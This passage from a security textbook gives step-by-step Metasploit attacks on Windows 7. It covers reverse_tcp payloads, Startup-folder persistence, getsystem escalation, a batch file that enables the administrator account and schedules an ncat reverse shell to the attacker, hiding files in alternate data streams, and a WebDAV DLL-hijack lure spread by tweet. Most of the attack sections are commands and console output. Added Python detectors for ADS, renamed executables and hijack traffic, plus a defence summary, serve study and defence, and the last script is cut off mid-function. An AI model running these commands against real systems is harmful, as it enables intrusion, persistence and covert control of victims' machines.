No worries here: I have a firewall and my antivirus definitions are up to date. (The program opens!) The program runs as expected, so the user has no need to be suspicious of anything.


[Screenshot: Windows Firewall with Advanced Security showing Windows Firewall is on for the Domain, Private, and Public profiles, with inbound connections that do not match a rule blocked and outbound connections that do not match a rule allowed; the WinSCP Login window (Host name, Port number 22, User name, Password, SFTP file protocol with Allow SCP fallback) is open in front]


Once a victim connects to the attack machine, the message “Meterpreter session opened” will 
appear. The attacker has been waiting for this moment and now controls the remote machine. 


[*] Sending stage (749056 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.100:22 -> 192.168.1.3:49706) at 2010-11-10 23:05:05 -0500


This may bring up a deep theological question: Who is the attacker really? The attacker can run the getuid command at their meterpreter shell to determine their level of permissions. Type


1. getuid 


meterpreter > getuid 
Server username: person-PC\person 
If the attacker is smart, they will immediately create another backdoor to the system.


They can do this by creating another msfpayload using a different port. This can be done by 
typing the following command: 


msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=53 X > hotfix.exe


ubuntu@ubuntu:~$ msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=53 X > hotfix.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: lhost=192.168.1.100, lport=53


The attacker needs to put the malware into a place where it will automatically execute when the user logs in to their system. One option is to place the executable into their startup folder, which is C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. After navigating to this folder in meterpreter using the cd command, the attacker can upload by typing


upload /home/ubuntu/Desktop/hotfix.exe .


Note: The pwd command is used to verify the directory. The dot is for the present directory. 


meterpreter > pwd
C:\Users\person\appdata\roaming\microsoft\windows\start menu\programs\startup
meterpreter > upload /home/ubuntu/Desktop/hotfix.exe .
[*] uploading : /home/ubuntu/Desktop/hotfix.exe -> .
[*] uploaded  : /home/ubuntu/Desktop/hotfix.exe -> .\hotfix.exe


The attacker will then start another multihandler listener on the new designated port with the 
correct lport and lhost options. Open a new terminal and type the following commands: 


Note: In order for the listener to work, msfconsole must be started with root privileges. 


1. msfconsole
2. use multi/handler
3. set lhost 192.168.1.100
4. set lport 53


msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 53
lport => 53
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.100:53
[*] Starting the payload handler...
The attacker can launch the malicious payload with meterpreter's execute command in the current connected session:

execute -f hotfix.exe


meterpreter > execute -f hotfix.exe 
Process 736 created. 


Once the hacker has a second shell connected, they can get higher privileges by typing getsystem. 


Note: getsystem is one of the privileged commands and can be loaded by typing use priv. Type 
the following commands to get your “before and after” identity. 


getuid
use priv
getsystem

[*] Started reverse handler on 192.168.1.100:53
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.3
[*] Meterpreter session 2 opened (192.168.1.100:53 -> 192.168.1.3:49158) at 2010-11-11 02:58:53 -0500

meterpreter > getuid
Server username: person-PC\person

meterpreter > getsystem
...got system (via technique 4).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer: PERSON-PC
OS      : Windows 7 (Build 7600, ).
Arch    : x86
Language: en_US


Once the attacker has SYSTEM access, they can exploit the victim machine without restrictions. The attacker can create a batch file of commands they want to execute. This can be accomplished by typing the following commands from a separate terminal.

1. touch tasks.txt
2. gedit tasks.txt
3. In gedit, enter the following lines:
   a. net user administrator /active:yes
   b. net user administrator P@sswOrd
   c. nmap-5.21-setup.exe /S
   d. at 12:00 "C:\program files\nmap\ncat.exe" -C 192.168.1.100 443 -e cmd.exe
4. mv tasks.txt tasks.bat


net user administrator /active:yes 

net user administrator P@sswOrd 

wget http://nmap.org/dist/nmap-5.21-setup.exe 
nmap-5.21-setup.exe /S 

at 12:00 "C:\program files\nmap\ncat.exe" -C 192.168.1.100 443 -e cmd.exe 


ubuntu@ubuntu:~$ touch tasks.txt
ubuntu@ubuntu:~$ gedit tasks.txt
ubuntu@ubuntu:~$ mv tasks.txt tasks.bat
The batch file tasks.bat and nmap-5.21-setup.exe can be uploaded to the victim by typing the following commands in the meterpreter shell connected to the victim:

1. upload /home/ubuntu/nmap-5.21-setup.exe c:\\users\\%username%
2. upload /home/ubuntu/tasks.bat c:\\users\\%username%


Install the latest version of Nmap on your Ubuntu system by typing
1. sudo apt-get install nmap

Start an Ncat listener on your system on port 443 by typing
2. sudo ncat -l -p 443

ubuntu@ubuntu:~$ sudo ncat -l -p 443

Execute the tasks.bat file (hidden) by typing
3. execute -H -f tasks.bat

meterpreter > execute -H -f tasks.bat
Process 3588 created.


At 12:00, a command prompt should be sent to the attack machine. Once the prompt connects 
to the attacker, the attacker can type whoami to determine their level of privilege. Task Scheduler 
runs at the SYSTEM level, so the level of privilege should be NT AUTHORITY\SYSTEM. Users 
do not normally get SYSTEM level privileges within Microsoft Windows. 


Microsoft Windows [Version 6.1.7600] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:\Windows \system32>whoami 
whoami 
nt authority\system 


With a command prompt, the user can check to see if the administrator account was successfully enabled by typing net user administrator and viewing the results of the output.


C:\Windows\system32>net user administrator
net user administrator

User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country code                 000 (System Default)
Account active               Yes


The hacker may not be the only one who notices that the administrator account is enabled. 
The person using the victim machine might notice that there is another logon account enabled. 
[Screenshot: Windows 7 Professional logon screen showing the person account]

It would be a good idea to hide the tasks.bat file so it is not detected by the user. The attacker can do this by using an alternate data stream (ADS). The ADS feature was added to the new technology file system (NTFS) for compatibility with older versions of Mac OSs. This "feature" of the file system will allow users to hide their data using the type command and a redirect. The dir /r command will display all ADSs in Windows Vista, Windows 7, and Server 2008. To hide the tasks.bat file using an ADS, navigate to the directory of tasks.bat and type


1. mkdir Games
2. type tasks.bat > Games:tasks.bat
3. del tasks.bat
4. dir /r


c:\Users\person>mkdir Games
mkdir Games

c:\Users\person>type tasks.bat > Games:tasks.bat
type tasks.bat > Games:tasks.bat

c:\Users\person>del tasks.bat
del tasks.bat

c:\Users\person>dir /r
dir /r
 Volume in drive C has no label.
 Volume Serial Number is FC86-6D8C

 Directory of c:\Users\person

11/13/2010  06:58 PM    <DIR>          .
11/13/2010  06:58 PM    <DIR>          ..
11/08/2010  07:16 PM    <DIR>          Contacts
11/13/2010  12:26 PM    <DIR>          Desktop
11/08/2010  07:16 PM    <DIR>          Documents
11/08/2010  07:16 PM    <DIR>          Downloads
11/08/2010  07:17 PM    <DIR>          Favorites
11/13/2010  06:57 PM    <DIR>          Games
                                   143 Games:tasks.bat:$DATA
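The dir /r listing above is what a responder has to read through on a suspect profile, and on a busy machine the one interesting line is easy to miss. The following parser is an added example, not code from the book: it pulls every named stream out of captured dir /r output and drops the one stream Windows writes on its own (Zone.Identifier, the mark of the web added to downloads), so what remains is worth a look. The listing it runs on is constructed after the book's.

```python
"""Added example, not from the book: extract alternate data streams from
`dir /r` output such as the listing above.

`dir /r` (Vista and later) prints each named stream on its own line, as
'<size> <owner>:<stream>:$DATA', below the file or directory that carries
it; the default unnamed stream is never listed, so every such line is an
ADS. The listing below is constructed after the book's, with one benign
Zone.Identifier stream (the mark of the web that Internet Explorer adds to
downloads) included so the filter has something to ignore.
"""
import re

# size, then owner:stream:$DATA; sizes carry thousands separators.
ADS_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Streams that Windows itself writes and that are not worth a look.
BENIGN_STREAMS = {"Zone.Identifier"}


def find_ads(dir_output):
    """Return every named stream as {'owner', 'stream', 'size'}."""
    streams = []
    for line in dir_output.splitlines():
        m = ADS_LINE.match(line)
        if m:
            streams.append({"owner": m.group(2).strip(),
                            "stream": m.group(3),
                            "size": int(m.group(1).replace(",", ""))})
    return streams


def suspicious_ads(dir_output):
    """Drop the benign streams; what is left deserves a look, especially a
    stream attached to a directory, which has no ordinary content at all."""
    return [s for s in find_ads(dir_output)
            if s["stream"] not in BENIGN_STREAMS]


# Constructed after the book's dir /r listing.
SAMPLE_DIR = """\
 Volume in drive C has no label.
 Volume Serial Number is FC86-6D8C

 Directory of c:\\Users\\person

11/13/2010  06:58 PM    <DIR>          .
11/13/2010  06:58 PM    <DIR>          ..
11/13/2010  06:57 PM    <DIR>          Games
                                   143 Games:tasks.bat:$DATA
11/12/2010  08:26 PM        15,623,433 nmap-5.21-setup.exe
                                    26 nmap-5.21-setup.exe:Zone.Identifier:$DATA
"""

if __name__ == "__main__":
    for s in suspicious_ads(SAMPLE_DIR):
        print(s)
```

The stream hanging off the Games directory is the one the book plants; a directory has no default data stream, so any $DATA stream attached to one is unusual on its own, before the content is even read.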
Another technique a hacker can use for data hiding is changing the extension. Most forensic tools like EnCase, FTK, and X-Ways will detect both ADS and file extension changes. The forensic tools use the file signatures to detect the true type of the file. Gary Kessler has a website that lists most file signatures: garykessler.net/library/file_sigs.html. In this case the attacker will rename the Nmap file to readme.txt so a user will be less likely to detect it. To rename the Nmap installer, navigate to its directory and type


1. ren nmap-5.21-setup.exe readme.txt 
2. dir 


c:\Users\person>ren nmap-5.21-setup.exe readme.txt
ren nmap-5.21-setup.exe readme.txt

c:\Users\person>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC86-6D8C

 Directory of c:\Users\person

11/13/2010  08:14 PM    <DIR>          .
11/13/2010  08:14 PM    <DIR>          ..
11/08/2010  07:16 PM    <DIR>          Contacts
11/13/2010  08:13 PM    <DIR>          Desktop
11/08/2010  07:16 PM    <DIR>          Documents
11/08/2010  07:16 PM    <DIR>          Downloads
11/08/2010  07:17 PM    <DIR>          Favorites
11/13/2010  06:57 PM    <DIR>          Games
11/08/2010  07:17 PM    <DIR>          Links
11/08/2010  07:16 PM    <DIR>          Music
11/08/2010  07:16 PM    <DIR>          Pictures
11/13/2010  07:01 PM    <DIR>          RadioStations
11/12/2010  08:26 PM        15,623,433 readme.txt


Even though it has a bad extension, the Nmap file can run if the user types readme.txt /S. 


C:\Users\person>readme.txt /S 
readme.txt /S 


A hex editor, like HxD, can be used to open the readme.txt file and verify that it is an .exe even though it has a .txt extension, because the file signature is MZ.
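The signature check the hex editor makes by eye is the same one a file-type scanner automates. The following is an added example, not code from the book or from any forensic tool: it treats a file as a Windows executable only when the MZ header's e_lfanew field points at a PE signature (an MZ header alone only proves a DOS stub), and reports when such content sits behind a non-executable name such as readme.txt. The sample header is constructed, not taken from any real binary.

```python
"""Added example, not from the book: identify a renamed executable by its
file signature instead of its extension, the check HxD and the forensic
tools above rely on.

A Windows executable starts with 'MZ'; the little-endian 32-bit value at
offset 0x3C (e_lfanew) gives the offset of the 'PE\\0\\0' signature. 'MZ'
alone only proves a DOS header, so both are required before calling a file
a PE. The sample header is constructed, not taken from any real binary.
"""
import struct

EXECUTABLE_EXTENSIONS = {"exe", "dll", "sys", "scr", "cpl", "ocx", "drv"}


def is_pe(data):
    """True when data carries a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def extension_mismatch(filename, data):
    """Describe the mismatch when PE content hides behind a non-executable
    name (readme.txt above); None when name and content agree."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if is_pe(data) and ext not in EXECUTABLE_EXTENSIONS:
        return "PE executable, name says %s" % ("." + ext if ext else "no extension")
    return None


def build_sample_pe():
    """Minimal constructed header: 'MZ', e_lfanew = 0x40, 'PE\\0\\0' at 0x40."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\0\0" + b"\0" * 20


if __name__ == "__main__":
    sample = build_sample_pe()
    print(extension_mismatch("readme.txt", sample))
    print(extension_mismatch("nmap-5.21-setup.exe", sample))
```

Gary Kessler's signature list covers many more formats in the same way: each entry is a fixed byte pattern at a known offset, so the same shape of check (read the header, compare at the offset, compare against the claimed extension) extends beyond PE files.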


[Screenshot: readme.txt opened in the HxD hex editor; offset 00000000 begins with the MZ signature, and the DOS stub text "This program cannot be run in DOS mode" appears at offsets 00000040 through 00000060]
Metasploit does not have to be used from a Linux or Mac OS X environment. The Metasploit
framework also runs well on Microsoft Windows platforms. Start by downloading Metasploit 
from the website www.metasploit.com. It may work out better for you if you install it on a VM. In 
order to get the program to work properly, use it on a machine without any antivirus or software 
firewall. You need a software firewall and antivirus on your system in today’s world, but those 
items may corrupt a Metasploit installation. You can use XP, 2003, Vista, or Windows 7 as your 
attack platform. If you prefer Linux, you can also download the preconfigured BackTrack 4 R1 
VM from the download area on the www.backtrack-linux.org website. 


[Installer warning: This product is not compatible with common anti-virus solutions. Before continuing, please disable any installed anti-virus software or add an exclusion for the Metasploit installation directory. Failure to do so can lead to a corrupt installation and the malfunctioning of certain exploit modules.]


Before you start Metasploit, always make sure you have the most recent version. The product 
is updated frequently and it is essential to update it in order to get the latest exploits. In order 
to make sure Metasploit is up to date, select Metasploit Update from the Metasploit Framework 
menu. After the updates have finished loading, hit Enter to exit from the update screen. When 
you launch Metasploit, the banner will indicate how many days have elapsed since your last 
update. 




Follow these directions to install Metasploit on a Windows attack machine: 


1. Download the latest version of Metasploit from Metasploit.com. 

2. Double click on the .exe file and select OK to the AV and firewall warnings. 
3. Click Next at the Setup screen. 

4. Read the agreement over and click Accept if you accept the agreement.

5. Click Next for the folder location and Next at the Ready to Install screen. 
6. Click Finish after Metasploit has been installed successfully on your system. 


To start msfconsole on your Microsoft Windows machine, 


1. Open System Console from the Metasploit Framework menu bar. 
2. From the Console menu bar, select File, choose New Tab, and select Metasploit. 


[Screenshot: the Metasploit tab in the Windows console window, showing the banner:]

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 616 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10845 updated today (2010.10.29)


WebDAV DLL Hijacker 
The WebDAV Application DLL Hijacker is a formidable attack that works against systems when they launch a file that exists on a remote website. That file can be a Word, PowerPoint, or Excel file. Older (PPT, XLS, DOC) and newer (PPTX, XLSX, DOCX) Office formats are supported.


To search for this exploit within Metasploit, type search hijack. 


Exploits

   Name                                          Disclosure Date  Rank    Description
   windows/browser/webdav_dll_hijacker           2010-08-18       manual  WebDAV Application DLL Hijacker
   windows/mssql/ms09_004_sp_replwritetovarbin   2008-12-09       good    Microsoft SQL Server sp_replwritetovarbin


To find out more information about this exploit, type the following command: 
1. info windows/browser/webdav_dll_hijac
ker


msf > info windows/browser/webdav_dll_hijacker

       Name: WebDAV Application DLL Hijacker
    Version: 10454
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual

Provided by:
  hdm <hdm@metasploit.com>
  jduck <jduck@metasploit.com>
  jcran <jcran@metasploit.com>

Available targets:
  Id  Name
  0   Automatic

Basic options:
  Name        Current Setting  Required  Description
  BASENAME    policy           yes       The base name for the listed files.
  EXTENSIONS  txt              yes       The list of extensions to generate
  SHARENAME   documents        yes       The name of the top-level share.
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     80               yes       The daemon port to listen on (do not change)
  URIPATH     /                yes       The URI to use (do not change).

Payload information:
  Space: 2048

Description:
  This module presents a directory of file extensions that can lead to
  code execution when opened from the share. The default EXTENSIONS
  option must be configured to specify a vulnerable application type.

References:
  http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
  http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt


To use this exploit, type the following command: 
2. use windows/browser/webdav_dll_hijacker 


Some of the options that can be set for this exploit include 

- BASENAME 
- EXTENSIONS 
- SHARENAME 
- SRVHOST 


Note: The options SRVPORT and URIPATH are not to be changed. To set an option within the 
exploit submenu, type the following commands: 

3. set basename documents 
4. set extensions doc docx 
5. set sharename hacking 
6. set SRVHOST 192.168.1.100 
7. show options 


msf exploit(webdav_dll_hijacker) > set basename documents 
basename => documents 
msf exploit(webdav_dll_hijacker) > set extensions doc docx 
extensions => doc docx 
msf exploit(webdav_dll_hijacker) > set sharename hacking 
sharename => hacking 
msf exploit(webdav_dll_hijacker) > set SRVHOST 192.168.1.100 
SRVHOST => 192.168.1.100 
msf exploit(webdav_dll_hijacker) > show options 

Module options: 

  Name        Current Setting  Required  Description 
  ----        ---------------  --------  ----------- 
  BASENAME    documents        yes       The base name for the listed files. 
  EXTENSIONS  doc docx         yes       The list of extensions to generate 
  SHARENAME   hacking          yes       The name of the top-level share. 
  SRVHOST     192.168.1.100    yes       The local host to listen on. 
  SRVPORT     80               yes       The daemon port to listen on (do not change) 
  URIPATH     /                yes       The URI to use (do not change). 


After setting the exploit options, a payload must be selected and its options must be set: 


8. set payload windows/meterpreter/reverse_tcp 
9. set lhost 192.168.1.100 
10. exploit 
msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp 
msf exploit(webdav_dll_hijacker) > set lhost 192.168.1.100 
lhost => 192.168.1.100 
msf exploit(webdav_dll_hijacker) > exploit 
[*] Exploit running as background job. 
msf exploit(webdav_dll_hijacker) > 
[*] Started reverse handler on 192.168.1.100:4444 
[*] Exploit links are now available at \\192.168.1.100\hacking\ 
[*] Using URL: http://192.168.1.100:80/ 
[*] Server started. 


Now there has to be a way to get the victims to launch the malicious payload. But how? 


[Screenshot: tweet from jessevarsalone (jesse varsalone): "Hey all my followers, check out this awesome document on hacking. http://bit.ly/b3pWk6"] 


Wow, that looks like a cool tweet. I think I will click on it because this guy tweets good stuff. 


[Screenshot: Internet Explorer opening http://192.168.1.100/, and Windows Explorer browsing Network > 192.168.1.100 > hacking, which lists documents.doc and documents.docx (Microsoft Office, modified 11/14/2010 4:56 PM); 2 items, Offline status: Online] 


When the document is opened the meterpreter session is connected and the victim is now 
owned. 


286 m Defense against the Black Arts 


[*] 192.168.1.80:1044 PROPFIND => 207 Directory (/hacking/foo/) 
[*] 192.168.1.80:1044 PROPFIND => 207 Top-Level Directory 
[*] 192.168.1.80:1044 PROPFIND /hacking/System32/System32/vmhgfs.dll 
[*] 192.168.1.80:1044 PROPFIND => 207 File (/hacking/System32/System32/vmhgfs.dll) 
[*] 192.168.1.80:1044 GET => DLL Payload 
[*] 192.168.1.80:1044 PROPFIND /hacking/rundll32.exe 
[*] 192.168.1.80:1044 PROPFIND => 404 (/hacking/rundll32.exe) 
[*] Sending stage (749056 bytes) to 192.168.1.80 
[*] 192.168.1.80:1044 PROPFIND /hacking 
[*] 192.168.1.80:1044 PROPFIND => 301 (/hacking) 
[*] 192.168.1.80:1044 PROPFIND /hacking/ 
[*] 192.168.1.80:1044 PROPFIND => 207 Directory (/hacking/) 
[*] 192.168.1.80:1044 PROPFIND => 207 Top-Level Directory 
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.80:1048) at 2010-11-14 22:04:24 -0500 
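The server messages above show what this attack looks like on the wire from the defender's side: a client opens a document on a remote WebDAV share and its application then probes that same share for DLLs. The following detector, an added example that is not from the book or from Metasploit, runs that pattern over outbound proxy log lines in a constructed, simplified format (the format, sample lines and host names are assumptions).

```python
"""Flag WebDAV DLL-hijack fetches in outbound HTTP logs.

Added example, not from the book or from Metasploit. After a document is
opened from a remote share, the application's library search shows up as
PROPFIND/GET requests for .dll (or .exe/.pif) paths on the same host. A
client that fetched a document from a host and then asked that host for
code is reported, whatever status the code request received: a 404 still
proves the library search happened there.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed log format: "<timestamp> <client-ip> <METHOD> <url> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+"
    r"https?://(?P<host>[^/\s]+)(?P<path>\S*)\s+(?P<status>\d{3})$"
)

DOC_EXT = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx"}
CODE_EXT = {".dll", ".exe", ".pif"}  # payload types seen in the session above

Hit = Tuple[str, str, str, str]  # (client, host, document path, code path)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def extension(path: str) -> str:
    """Lower-cased extension of the last path component ('' if none)."""
    name = path.rsplit("/", 1)[-1].lower()
    dot = name.rfind(".")
    return name[dot:] if dot >= 0 else ""


def find_dll_hijack(lines: List[str]) -> List[Hit]:
    """Report each (client, host) pair that requests code after a document."""
    first_doc: Dict[Tuple[str, str], str] = {}
    seen: Set[Tuple[Tuple[str, str], str]] = set()
    hits: List[Hit] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["client"], rec["host"])
        ext = extension(rec["path"])
        if ext in DOC_EXT:
            first_doc.setdefault(key, rec["path"])      # remember the lure
        elif ext in CODE_EXT and key in first_doc:
            if (key, rec["path"]) in seen:              # one hit per code path
                continue
            seen.add((key, rec["path"]))
            hits.append((rec["client"], rec["host"], first_doc[key], rec["path"]))
    return hits


# Constructed sample log, modelled on the server-side messages above.
SAMPLE_LOG = """\
2010-11-14T22:03:51 192.168.1.80 PROPFIND http://192.168.1.100/hacking/ 207
2010-11-14T22:03:52 192.168.1.80 GET http://192.168.1.100/hacking/documents.docx 200
2010-11-14T22:03:55 192.168.1.80 PROPFIND http://192.168.1.100/hacking/System32/System32/vmhgfs.dll 207
2010-11-14T22:03:56 192.168.1.80 GET http://192.168.1.100/hacking/System32/System32/vmhgfs.dll 200
2010-11-14T22:03:57 192.168.1.80 PROPFIND http://192.168.1.100/hacking/rundll32.exe 404
2010-11-14T22:05:10 192.168.1.81 GET http://intranet.example/reports/q3.xlsx 200
2010-11-14T22:05:12 192.168.1.81 GET http://cdn.example/static/app.js 200
"""

if __name__ == "__main__":
    for client, host, doc, code in find_dll_hijack(SAMPLE_LOG.splitlines()):
        print(f"{client} opened {doc} on {host} and then requested {code}")
```

The second client in the sample opens a spreadsheet but never asks its source for code, so only the 192.168.1.80 session is reported.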


To view and interact with the connected sessions, type the following commands: 

1. sessions -l 
2. sessions -i 1 
3. sysinfo 


msf exploit(webdav_dll_hijacker) > sessions -l 

Active sessions 
=============== 

  Id  Type                   Information                   Connection 
  --  ----                   -----------                   ---------- 
  1   meterpreter x86/win32  person-PC\person @ PERSON-PC  192.168.1.100:4444 -> 192.168.1.80:1048 

msf exploit(webdav_dll_hijacker) > sessions -i 1 
[*] Starting interaction with 1... 

meterpreter > sysinfo 
Computer: PERSON-PC 
OS      : Windows 7 (Build 7600). 
Arch    : x86 
Language: en_US 


It is always good to elevate your privileges if possible. To do this, type the following: 


4. use priv 
5. getsystem 


meterpreter > getsystem 
[*] 192.168.1.80:1051 PROPFIND /hacking/twunk_16.pif 
[*] 192.168.1.80:1051 PROPFIND => 207 File (/hacking/twunk_16.pif) 
[*] 192.168.1.80:1051 PROPFIND /hacking 
[*] 192.168.1.80:1051 PROPFIND => 301 (/hacking) 
[*] 192.168.1.80:1051 PROPFIND /hacking/ 
[*] 192.168.1.80:1051 PROPFIND => 207 Directory (/hacking/) 
[*] 192.168.1.80:1051 PROPFIND => 207 Top-Level Directory 
[*] 192.168.1.80:1051 PROPFIND /hacking/ntvdm.exe 
[*] 192.168.1.80:1051 PROPFIND => 404 (/hacking/ntvdm.exe) 
...got system (via technique 4). 


The hacker can start a hidden command prompt so they do not alert the victim that they are on 
the user's system. To start a command prompt as a hidden process, type the following command: 
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6. execute -H -f cmd.exe -i 


meterpreter > execute -H -f cmd.exe -i 
Process 3328 created. 
Channel 1 created. 
[*] 192.168.1.80:1052 PROPFIND /hacking 
[*] 192.168.1.80:1052 PROPFIND => 301 (/hacking) 
[*] 192.168.1.80:1052 PROPFIND /hacking/ 
[*] 192.168.1.80:1052 PROPFIND => 207 Directory (/hacking/) 
[*] 192.168.1.80:1052 PROPFIND => 207 Top-Level Directory 
[*] 192.168.1.80:1052 PROPFIND /hacking 
[*] 192.168.1.80:1052 PROPFIND => 301 (/hacking) 
[*] 192.168.1.80:1052 PROPFIND /hacking/ 
[*] 192.168.1.80:1052 PROPFIND => 207 Directory (/hacking/) 
[*] 192.168.1.80:1052 PROPFIND => 207 Top-Level Directory 
[*] 192.168.1.80:1052 PROPFIND /hacking/cmd.exe 
[*] 192.168.1.80:1052 PROPFIND => 404 (/hacking/cmd.exe) 
'\\192.168.1.100\hacking' 
CMD.EXE was started with the above path as the current directory. 
UNC paths are not supported. Defaulting to Windows directory. 
Microsoft Windows [Version 6.1.7600] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\Windows> 


The attacker can then dominate the system by engaging in account, file, and service manipulation. 


C:\Windows>net user "SYSTEM " P@ssw0rd /add 
net user "SYSTEM " P@ssw0rd /add 
The command completed successfully. 

C:\Windows>net stop "Windows Update" 
net stop "Windows Update" 
The Windows Update service is stopping. 
The Windows Update service was stopped successfully. 


Summary 


Metasploit is a powerful framework that allows penetration testers, security professionals, and 
hackers to attack weaknesses in systems that are unpatched or have poorly implemented security 
measures. The following measures can help to protect resources within a company: 

- Keeping OSs patched. 
- Keeping antivirus definitions up to date. 
- Updating application software. 
- Updating browsers. 
- User education. 
- Don't open attachments from unknown entities. 

Several lessons should be learned from this chapter, including 

- Antivirus does not offer 100% protection. 
- Patched systems can still be vulnerable. 
- Once an attacker gains control of a system, security measures may become unreliable. 
- Artifacts will often be left behind by the attacker. 


As you become more familiar with Metasploit, you can better understand computer security and 
have a real idea of how attackers can use a tool like this to exploit a system. Tools like this allow 
less-sophisticated attackers to carry out highly sophisticated attacks. 


Chapter 11 
Other Attack Tools 


Overview 


In this chapter we go over the process of using other attack tools in the penetration of a network. 
Generally, these tools are used to backdoor the network after a hacker has already exploited a way 
in. One of the hard jobs for the hacker is maintaining an undetectable presence in the network. 
Hackers use what are called command and control tools to control victims, infiltrate further, and 
build a significant presence throughout the network while trying to remain undetected and subvert 
detection. These command and control tools allow full command and control of the server, with 
features ranging from stealing files, keylogging, and dumping passwords to screen capturing. 

One of the primary ways to detect command and control tools is to detect the tools running 
on the computer itself. This involves dumping the running processes and looking for associated 
process identifiers (PIDs) that could be running malware and are beaconing to unknown domain 
name system (DNS) or Internet protocol (IP) addresses. There are a few investigative tools that are 
used to help detect command and control programs on a possible victim. 


Note: First run antivirus! This is one of the most important tools and will look for the signatures 
of the command and control executable resident on the hard drive. 


Sysinternals 


The sysinternals (http://technet.microsoft.com/en-us/sysinternals/) suite is a compilation of sys- 
tem administration utilities that contains troubleshooting tools; however, these tools can also be 
geared to performing forensics investigation, such as determining running processes associated 
with malware and beacons to unknown IP addresses and ports. 


Pslist 


Pslist shows the running processes and the associated PID. This is good for detecting rogue PIDs 
such as command and control tools. The elapsed time shows how long the service is running, 
which helps the investigator to see what PIDs are not part of the normal startup process. 
[Screenshot: pslist output (process information for VICTIM) with columns including Pid, Pri, Thd and elapsed time] 


Tasklist /m 


Tasklist is a program included with Windows that lists the running tasks on the computer from 
the command line, along with their associated dynamic link libraries (DLLs). This is especially 
important for detecting malware and the malicious DLLs involved. The /m switch shows you the 
associated DLLs. 


Netstat -ano 


Netstat is a command line tool that is included within Windows to give you network statistics. 
However, with the right switches this simple tool will allow you to detect active command and 
control malware beacons. Adding -a displays all TCP and UDP connections; -n suppresses name 
resolution so that IP addresses are shown; and -o adds the PID of the process that owns each 
connection, that is, the process beaconing to that IP address. This is absolutely helpful in 
detecting what is responsible for beaconing and figuring out what process/executable is 
attributed to it. Here is an example of netstat -ano output. 


[Screenshot: netstat -ano output including the line 
TCP    192.168.1.34:1495    10.9.2.3:80    ESTABLISHED    3560] 

After we have run a netstat we see that our host 192.168.1.34 is beaconing on port 80 to 10.9.2.3 
via PID 3560. 

[Screenshot: C:\WINDOWS\system32\cmd.exe window with pslist output listing the running 
processes and their PIDs, among them Poison Ivy 2.3.2 and PsList (PID 3000)] 
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Therefore, we would then want to run a pslist to determine the associated PID. As we can see 
from running a pslist it comes up as IEXPLORE. This may be because the malicious executable 
injected itself into an existing running process of Internet Explorer or may have created its own 
PID to trick the user to think that program is just open. Once we have identified the PID it is then 
helpful to open up Process Explorer to explore the process tree and find associated DLLs that may 
be functioning with this malware. 
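The hand-driven procedure above (netstat -ano for the PID, pslist or tasklist for the image name) can be automated over saved command output. The following script is an added example, not from the book or from Sysinternals; the netstat and tasklist text is constructed to mirror the scenario above, and the list of known-good networks is an assumption the analyst has to supply.

```python
"""Join netstat -ano with tasklist output to name a beaconing process.

Added example, not from the book. Every ESTABLISHED connection whose
remote address lies outside the analyst's known-good networks is
reported together with the image name owning its PID. As the chapter
notes, the name alone (here IEXPLORE.EXE) can be exactly what injection
makes it look like; the join only tells you which process to open in
Process Explorer next.
"""
import ipaddress
import re
from typing import Dict, List, NamedTuple

# netstat -ano rows: Proto, Local Address, Foreign Address, [State], PID
NETSTAT_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)"
    r"(?:\s+(?P<state>[A-Z_]+))?\s+(?P<pid>\d+)\s*$"
)
# tasklist rows: the image name may contain spaces, so anchor on the right.
TASKLIST_RE = re.compile(
    r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$"
)


class Beacon(NamedTuple):
    pid: str
    image: str
    local: str
    remote: str


def parse_tasklist(text: str) -> Dict[str, str]:
    """Map PID -> image name from plain `tasklist` output."""
    procs: Dict[str, str] = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
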